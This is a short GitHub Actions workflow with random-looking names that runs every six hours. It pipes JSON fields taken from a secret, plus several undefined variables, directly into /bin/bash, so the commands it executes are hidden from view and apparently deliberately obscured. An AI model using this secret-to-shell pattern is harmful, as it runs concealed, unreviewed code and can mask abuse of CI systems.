name: shenjingcha4189
on:
  workflow_dispatch:
  schedule:
    - cron: '49 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: shenjingcha4189
        env:
          zelc6389: ${{ secrets.zelc6389 }}
        run: |
          echo $zelc6389 | jq -r .mgfkz23054 | /bin/bash
          echo $vtzas1696 | jq -r .xys4330 | /bin/bash
          echo $gx606 | jq -r .z17152 | /bin/bash
          echo $zr072 | jq -r .ygj737 | /bin/bash
          echo $uyc60 | jq -r .r65 | /bin/bash
          echo $ouej7723 | jq -r .h3 | /bin/bash
          echo $hc88443 | jq -r .zvk084 | /bin/bash
          echo $wc65 | jq -r .b0594 | /bin/bash
          echo $fofpi1491 | jq -r .plxb6828 | /bin/bash
          echo $wvkwy4 | jq -r .xnlr3 | /bin/bash

